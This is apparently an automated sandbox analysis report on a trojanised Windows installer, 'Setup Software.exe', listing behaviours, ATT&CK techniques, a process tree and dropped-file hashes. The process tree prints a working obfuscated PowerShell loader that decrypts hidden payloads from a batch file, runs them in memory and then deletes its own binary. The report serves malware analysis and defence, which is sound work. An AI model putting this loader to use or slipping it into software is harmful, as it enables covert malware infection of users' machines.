6d531e627d1474d4fbd1cc669af856f3c04182a9172ad1e73e679d8a206479f5

Analysis

max time kernel
141s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
17/10/2024, 15:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Setup Software.exe
Size

23.8MB
MD5

24bd5fb6e20496abbf7497999e4dd6bb
SHA1

04f87a82c651fd9cb9ba43a9cb31c93c137d682c
SHA256

6d531e627d1474d4fbd1cc669af856f3c04182a9172ad1e73e679d8a206479f5
SHA512

eacf0fa7b896615b7440d7a246caba05f16855bfa1ce38d2c1d4133e9171934fe08657fb3842ac23f5e3a2904dfc3405a7f438ff7f8ff18ed28a9917c8337eca
SSDEEP

393216:yFx5mLMvl0z2kFAaZa73fLNFKhM7f/u1E3t3Ghsry/i:ox8YvTkAaQzK27fW1E39x

Score

8^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1976	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	exp1.bat.exe

Executes dropped EXE 1 IoCs

pid	Process
4256	exp1.bat.exe

Loads dropped DLL 9 IoCs

pid	Process
2072	MsiExec.exe
1952	MsiExec.exe
1952	MsiExec.exe
1952	MsiExec.exe
1952	MsiExec.exe
1952	MsiExec.exe
1952	MsiExec.exe
1952	MsiExec.exe
1952	MsiExec.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\J:	Setup Software.exe
File opened (read-only)	\??\Z:	Setup Software.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\U:	Setup Software.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\I:	Setup Software.exe
File opened (read-only)	\??\P:	Setup Software.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\N:	Setup Software.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\H:	Setup Software.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\A:	Setup Software.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\S:	Setup Software.exe
File opened (read-only)	\??\X:	Setup Software.exe
File opened (read-only)	\??\Y:	Setup Software.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\K:	Setup Software.exe
File opened (read-only)	\??\O:	Setup Software.exe
File opened (read-only)	\??\Q:	Setup Software.exe
File opened (read-only)	\??\R:	Setup Software.exe
File opened (read-only)	\??\T:	Setup Software.exe
File opened (read-only)	\??\W:	Setup Software.exe
File opened (read-only)	\??\G:	Setup Software.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\L:	Setup Software.exe
File opened (read-only)	\??\M:	Setup Software.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\E:	Setup Software.exe
File opened (read-only)	\??\V:	Setup Software.exe
File opened (read-only)	\??\X:	msiexec.exe

Drops file in Windows directory 16 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSICF48.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID110.tmp	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICE2D.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{7EB3A00A-9FBF-4E59-9A74-D98F9ED3984D}	msiexec.exe
File created	C:\Windows\Installer\e57cdb4.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICFB7.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID006.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE269.tmp	msiexec.exe
File created	C:\Windows\Installer\e57cdb0.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID150.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID299.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\e57cdb0.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICEBB.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	exp1.bat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Setup Software.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
4912	msiexec.exe
4912	msiexec.exe
1976	powershell.exe
1976	powershell.exe
1976	powershell.exe
4256	exp1.bat.exe
4256	exp1.bat.exe
4256	exp1.bat.exe
4640	powershell.exe
4640	powershell.exe
4640	powershell.exe
4640	powershell.exe
4640	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeSecurityPrivilege	4912	msiexec.exe
Token: SeCreateTokenPrivilege	4200	Setup Software.exe
Token: SeAssignPrimaryTokenPrivilege	4200	Setup Software.exe
Token: SeLockMemoryPrivilege	4200	Setup Software.exe
Token: SeIncreaseQuotaPrivilege	4200	Setup Software.exe
Token: SeMachineAccountPrivilege	4200	Setup Software.exe
Token: SeTcbPrivilege	4200	Setup Software.exe
Token: SeSecurityPrivilege	4200	Setup Software.exe
Token: SeTakeOwnershipPrivilege	4200	Setup Software.exe
Token: SeLoadDriverPrivilege	4200	Setup Software.exe
Token: SeSystemProfilePrivilege	4200	Setup Software.exe
Token: SeSystemtimePrivilege	4200	Setup Software.exe
Token: SeProfSingleProcessPrivilege	4200	Setup Software.exe
Token: SeIncBasePriorityPrivilege	4200	Setup Software.exe
Token: SeCreatePagefilePrivilege	4200	Setup Software.exe
Token: SeCreatePermanentPrivilege	4200	Setup Software.exe
Token: SeBackupPrivilege	4200	Setup Software.exe
Token: SeRestorePrivilege	4200	Setup Software.exe
Token: SeShutdownPrivilege	4200	Setup Software.exe
Token: SeDebugPrivilege	4200	Setup Software.exe
Token: SeAuditPrivilege	4200	Setup Software.exe
Token: SeSystemEnvironmentPrivilege	4200	Setup Software.exe
Token: SeChangeNotifyPrivilege	4200	Setup Software.exe
Token: SeRemoteShutdownPrivilege	4200	Setup Software.exe
Token: SeUndockPrivilege	4200	Setup Software.exe
Token: SeSyncAgentPrivilege	4200	Setup Software.exe
Token: SeEnableDelegationPrivilege	4200	Setup Software.exe
Token: SeManageVolumePrivilege	4200	Setup Software.exe
Token: SeImpersonatePrivilege	4200	Setup Software.exe
Token: SeCreateGlobalPrivilege	4200	Setup Software.exe
Token: SeCreateTokenPrivilege	4200	Setup Software.exe
Token: SeAssignPrimaryTokenPrivilege	4200	Setup Software.exe
Token: SeLockMemoryPrivilege	4200	Setup Software.exe
Token: SeIncreaseQuotaPrivilege	4200	Setup Software.exe
Token: SeMachineAccountPrivilege	4200	Setup Software.exe
Token: SeTcbPrivilege	4200	Setup Software.exe
Token: SeSecurityPrivilege	4200	Setup Software.exe
Token: SeTakeOwnershipPrivilege	4200	Setup Software.exe
Token: SeLoadDriverPrivilege	4200	Setup Software.exe
Token: SeSystemProfilePrivilege	4200	Setup Software.exe
Token: SeSystemtimePrivilege	4200	Setup Software.exe
Token: SeProfSingleProcessPrivilege	4200	Setup Software.exe
Token: SeIncBasePriorityPrivilege	4200	Setup Software.exe
Token: SeCreatePagefilePrivilege	4200	Setup Software.exe
Token: SeCreatePermanentPrivilege	4200	Setup Software.exe
Token: SeBackupPrivilege	4200	Setup Software.exe
Token: SeRestorePrivilege	4200	Setup Software.exe
Token: SeShutdownPrivilege	4200	Setup Software.exe
Token: SeDebugPrivilege	4200	Setup Software.exe
Token: SeAuditPrivilege	4200	Setup Software.exe
Token: SeSystemEnvironmentPrivilege	4200	Setup Software.exe
Token: SeChangeNotifyPrivilege	4200	Setup Software.exe
Token: SeRemoteShutdownPrivilege	4200	Setup Software.exe
Token: SeUndockPrivilege	4200	Setup Software.exe
Token: SeSyncAgentPrivilege	4200	Setup Software.exe
Token: SeEnableDelegationPrivilege	4200	Setup Software.exe
Token: SeManageVolumePrivilege	4200	Setup Software.exe
Token: SeImpersonatePrivilege	4200	Setup Software.exe
Token: SeCreateGlobalPrivilege	4200	Setup Software.exe
Token: SeCreateTokenPrivilege	4200	Setup Software.exe
Token: SeAssignPrimaryTokenPrivilege	4200	Setup Software.exe
Token: SeLockMemoryPrivilege	4200	Setup Software.exe
Token: SeIncreaseQuotaPrivilege	4200	Setup Software.exe
Token: SeMachineAccountPrivilege	4200	Setup Software.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
4200	Setup Software.exe
4524	msiexec.exe
4524	msiexec.exe

Suspicious use of WriteProcessMemory 19 IoCs

description	pid	Process	procid_target
PID 4912 wrote to memory of 2072	4912	msiexec.exe	89
PID 4912 wrote to memory of 2072	4912	msiexec.exe	89
PID 4912 wrote to memory of 2072	4912	msiexec.exe	89
PID 4200 wrote to memory of 4524	4200	Setup Software.exe	90
PID 4200 wrote to memory of 4524	4200	Setup Software.exe	90
PID 4200 wrote to memory of 4524	4200	Setup Software.exe	90
PID 4912 wrote to memory of 1952	4912	msiexec.exe	91
PID 4912 wrote to memory of 1952	4912	msiexec.exe	91
PID 4912 wrote to memory of 1952	4912	msiexec.exe	91
PID 4912 wrote to memory of 336	4912	msiexec.exe	94
PID 4912 wrote to memory of 336	4912	msiexec.exe	94
PID 336 wrote to memory of 1976	336	cmd.exe	96
PID 336 wrote to memory of 1976	336	cmd.exe	96
PID 336 wrote to memory of 4256	336	cmd.exe	97
PID 336 wrote to memory of 4256	336	cmd.exe	97
PID 336 wrote to memory of 4256	336	cmd.exe	97
PID 4256 wrote to memory of 4640	4256	exp1.bat.exe	100
PID 4256 wrote to memory of 4640	4256	exp1.bat.exe	100
PID 4256 wrote to memory of 4640	4256	exp1.bat.exe	100

C:\Users\Admin\AppData\Local\Temp\Setup Software.exe
"C:\Users\Admin\AppData\Local\Temp\Setup Software.exe"
1⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4200
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AJAB Software\S.R.L. Software 10.24.1\install\ED3984D\S.R.L. Software.msi" AI_SETUPEXEPATH="C:\Users\Admin\AppData\Local\Temp\Setup Software.exe" SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1728938526 " AI_EUIMSI=""
  2⤵
  - Enumerates connected drives
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  PID:4524

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4912
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding D2789891FE7FCAC3A9C053F7279547D7 C
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:2072
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 4E6E44FE3A7BD072D19C9C732DBE1261
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:1952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\AJAB Software\S.R.L. Software\exp1.bat" /install /quiet /norestart"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:336
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -w hidden -c #
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1976
- - C:\Users\Admin\AppData\Roaming\AJAB Software\S.R.L. Software\exp1.bat.exe
    "C:\Users\Admin\AppData\Roaming\AJAB Software\S.R.L. Software\exp1.bat.exe" function Bm($n){$n.Replace('Riksr', '')}$cKZC=Bm 'ChanRiksrgeExRiksrtRiksrensRiksrioRiksrnRiksr';$IJEl=Bm 'InRiksrvoRiksrkeRiksr';$pnkn=Bm 'LoRiksraRiksrdRiksr';$YwMW=Bm 'CreRiksrateRiksrDeRiksrcrRiksrypRiksrtoRiksrrRiksr';$zKUA=Bm 'FroRiksrmBaRiksrse6Riksr4SRiksrtrRiksrinRiksrgRiksr';$oCMc=Bm 'EnRiksrtryRiksrPRiksroiRiksrntRiksr';$GAeW=Bm 'RRiksreadRiksrLinRiksresRiksr';$LRBO=Bm 'FirRiksrstRiksr';$XSXj=Bm 'TrRiksraRiksrnsfRiksroRiksrrmRiksrFRiksrinaRiksrlRiksrBlRiksrocRiksrkRiksr';$vizH=Bm 'GetRiksrCurRiksrreRiksrntPRiksrrocRiksresRiksrsRiksr';function PCiNw($dQXOR){$PcplD=[System.Security.Cryptography.Aes]::Create();$PcplD.Mode=[System.Security.Cryptography.CipherMode]::CBC;$PcplD.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$PcplD.Key=[System.Convert]::$zKUA('XHAc6uN/C2qu8lqQ8Tc+TOX/hCrdY4onN101A1I1eMM=');$PcplD.IV=[System.Convert]::$zKUA('PIgZC5AXEmQxBP2h1Wgrlg==');$eWaBR=$PcplD.$YwMW();$Sseam=$eWaBR.$XSXj($dQXOR,0,$dQXOR.Length);$eWaBR.Dispose();$PcplD.Dispose();$Sseam;}function xbbOH($dQXOR){$sdAWu=New-Object System.IO.MemoryStream(,$dQXOR);$MWrPp=New-Object System.IO.MemoryStream;$qwBOk=New-Object System.IO.Compression.GZipStream($sdAWu,[IO.Compression.CompressionMode]::Decompress);$qwBOk.CopyTo($MWrPp);$qwBOk.Dispose();$sdAWu.Dispose();$MWrPp.Dispose();$MWrPp.ToArray();}function GlIBa($dQXOR,$DaASB){[System.Reflection.Assembly]::$pnkn([byte[]]$dQXOR).$oCMc.$IJEl($null,$DaASB);}$GqUFZ=[System.Linq.Enumerable]::$LRBO([System.IO.File]::$GAeW([System.IO.Path]::$cKZC([System.Diagnostics.Process]::$vizH().MainModule.FileName, $null)));$BnDZd = $GqUFZ.Substring(3).Split('\');$rDwBA=xbbOH (PCiNw ([Convert]::$zKUA($BnDZd[0])));$bOnOx=xbbOH (PCiNw ([Convert]::$zKUA($BnDZd[1])));GlIBa $bOnOx $null;GlIBa $rDwBA $null;
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4256
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(4256);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:4640

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e57cdb3.rbs

Filesize
1.2MB

MD5
37375b91383620dc602c9b944fd6197b

SHA1
6b486604a210879d3c0a89e32b89543767af86e3

SHA256
901f320177a471d1e06bbaa61747890616c0d45bc6c8e512de6600c73d45fd58

SHA512
3c8e1e7debca22b8b5011799ab3f3eba6375d67810e86931f2875cd10e15c3cafc8bcf9fb42c32d3bf4a5f1da3cab8ef2b39f625a4232d5baadf46820f729917

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
91ec98ca4d8bfbcace6075363730c894

SHA1
422a0f0e4e7ea628b20200c2f44c434fb5634a27

SHA256
9791fc89327e9dc4ae065c6f0cb6c0451862e093488be5f9ff93979c20da94ba

SHA512
2b553df4456a7d50e9d15948fab92da05590e21f94b33e4636bc433ce9eccdc20fa9a629a1f287a8677e52f2e98cb88c05b6848832ca7e096fb4b82ebfd0769d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSICBCD.tmp

Filesize
557KB

MD5
2c9c51ac508570303c6d46c0571ea3a1

SHA1
e3e0fe08fa11a43c8bca533f212bdf0704c726d5

SHA256
ff86c76a8d5846b3a1ad58ff2fd8e5a06a84eb5899cdee98e59c548d33335550

SHA512
df5f1def5aac44f39a2dfde9c6c73f15f83a7374b4ad42b67e425ccb7ac99a64c5701b676ae46d2f7167a04a955158031a839e7878d100aaf8fab0ce2059f127

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oygowy02.d4y.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\AJAB Software\S.R.L. Software 10.24.1\install\ED3984D\S.R.L. Software.msi

Filesize
2.7MB

MD5
967b13665d2fa2e71b5e6eebe3ff50c9

SHA1
5d1fb97d04141e926e4c24d0b1d8d222bf5c1b06

SHA256
d64db75466148261f139409c5e22517a79fe7d0c1410f5d355f904e1af0f61a6

SHA512
7e64445d98c8732ee0b6f699e003a9f8ca85fb59a6ce838bfdd3d0a6f9ca25538b5317ec3d51a64fefcf56aab0f73d1a9f4e00e38ff93557b8a855145805aed7

Download Submit
C:\Users\Admin\AppData\Roaming\AJAB Software\S.R.L. Software 10.24.1\install\ED3984D\TempFolder\FC_Loader.vbs

Filesize
101B

MD5
0832d836af4ddb7b2c7107386c161762

SHA1
7a02f17df9afb3d006532b2e5b8df4fddc368e38

SHA256
d2202bfe35af8f2c24c666debdc0d607039d2e41a65d6b9b015fca59b0b6dadd

SHA512
440239c1f591eb4179e3e5e3e6ef96b65942891e280031f431083a66ff0c196c5bc91023dcbbf29b8442763b2b906f13f22e57076a68109fdb4b7e969f7334e4

Download Submit
C:\Users\Admin\AppData\Roaming\AJAB Software\S.R.L. Software 10.24.1\install\ED3984D\exp1.bat

Filesize
90KB

MD5
b02bcc615ba89266f10b0af4bcd28390

SHA1
482d700f81c3480fa9fc0bbe9b194dd4c96fbd8f

SHA256
f838ec5a4b277133a578605e8bdd0be7fbeb6d97f4d2b7cddddeaf947327a02b

SHA512
6ccf7df67ac93628590d90a4fd161a5d8985d28ef69f16bc6e55ec1f568760e3e1f50d26dcddedd8f6df5a6bc946fa81eb3061c9c91d803fa3c451e4ad8e009b

Download Submit
C:\Users\Admin\AppData\Roaming\AJAB Software\S.R.L. Software\exp1.bat.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Windows\Installer\MSID006.tmp

Filesize
705KB

MD5
e361f7bfaac80ff5bac709905d6b1a16

SHA1
724d294983509fd37cf282403e25f26890fbfc8f

SHA256
44cfe8ece8a14c06bc0c953176680623e802769b921f39b86647b541ef1eb06d

SHA512
47b7d7beb22484b67f05a3dbf28f78e3c55f1ff07204eac613e6912f82c713e4e8622d5f40a6a04731f6a9e0e5ab15e05b132493a4b06f882532a470a4bddedf

Download Submit
C:\Windows\Installer\MSID150.tmp

Filesize
614KB

MD5
8888fe82ff353145f7a0066f225af63d

SHA1
2c332d406f23a124e28eae090606039bb13f497c

SHA256
b034ea35c1cf08e216001c0e2ee1a29227f60fe8ff8fc9122e37046bf34734a6

SHA512
beae1ec2ed19a5dfe7e90bf499d2f1af82a3f3148cbcb63339051661719094fe4c7279f03c1bc7c344ebd6c2bd40b146f6c35a142fd3bd20fb71217b768d6ca6

Download Submit
memory/1976-71-0x00000258F0690000-0x00000258F06B2000-memory.dmp

Filesize
136KB

Download
memory/4256-92-0x00000000058A0000-0x0000000005BF4000-memory.dmp

Filesize
3.3MB

Download
memory/4256-100-0x0000000006390000-0x00000000063A4000-memory.dmp

Filesize
80KB

Download
memory/4256-82-0x0000000005730000-0x0000000005796000-memory.dmp

Filesize
408KB

Download
memory/4256-80-0x0000000004EE0000-0x0000000004F02000-memory.dmp

Filesize
136KB

Download
memory/4256-94-0x0000000005D90000-0x0000000005DAE000-memory.dmp

Filesize
120KB

Download
memory/4256-95-0x0000000005DD0000-0x0000000005E1C000-memory.dmp

Filesize
304KB

Download
memory/4256-96-0x0000000007750000-0x0000000007DCA000-memory.dmp

Filesize
6.5MB

Download
memory/4256-97-0x0000000006350000-0x000000000636A000-memory.dmp

Filesize
104KB

Download
memory/4256-98-0x0000000006380000-0x000000000638A000-memory.dmp

Filesize
40KB

Download
memory/4256-81-0x00000000056C0000-0x0000000005726000-memory.dmp

Filesize
408KB

Download
memory/4256-102-0x00000000074A0000-0x00000000074AC000-memory.dmp

Filesize
48KB

Download
memory/4256-104-0x00000000074B0000-0x00000000076D8000-memory.dmp

Filesize
2.2MB

Download
memory/4256-79-0x0000000004FA0000-0x00000000055C8000-memory.dmp

Filesize
6.2MB

Download
memory/4256-78-0x0000000004930000-0x0000000004966000-memory.dmp

Filesize
216KB

Download
memory/4640-134-0x0000000007260000-0x00000000072F6000-memory.dmp

Filesize
600KB

Download
memory/4640-135-0x0000000007230000-0x0000000007252000-memory.dmp

Filesize
136KB

Download
memory/4640-136-0x00000000078E0000-0x0000000007E84000-memory.dmp

Filesize
5.6MB

Download